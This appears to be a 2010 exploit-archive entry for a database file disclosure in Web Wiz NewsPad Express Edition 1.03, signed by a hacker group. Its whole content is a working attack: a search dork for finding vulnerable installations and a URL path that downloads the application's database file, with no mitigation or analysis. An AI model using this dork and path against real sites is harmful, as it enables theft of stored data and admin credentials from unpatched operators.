[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Web Wiz NewsPad Express Edition 1.03 Database File Disclosure Vulnerability
# Published : 2010-11-15
# Author : keracker
# Previous Title : Nuked-Klan Module Boutique Blind SQL Injection
# Next Title : BPAffiliate Affiliate Tracking Authentication Bypass Vulnerability


=============================================================
NewsPad Database Download Vulnerability

=============================================================

#############################################################

#

# Exploit Title: NewsPad Database Download Vulnerability

# Date: 15/11/2010

# Author: keracker

# Software Link: www.webwiz.co.uk/webwiznewspad/downloads.asp

# Tested on: windows

# dork : "NewsPad Admin Login"

# Contact: h4m3d_68@yahoo.com ~ Black.hat.tm@gmail.com

#

############################################################

exploit # www.target.com/path/database/NewsPad.mdb


############################################################

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

      WE ARE BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker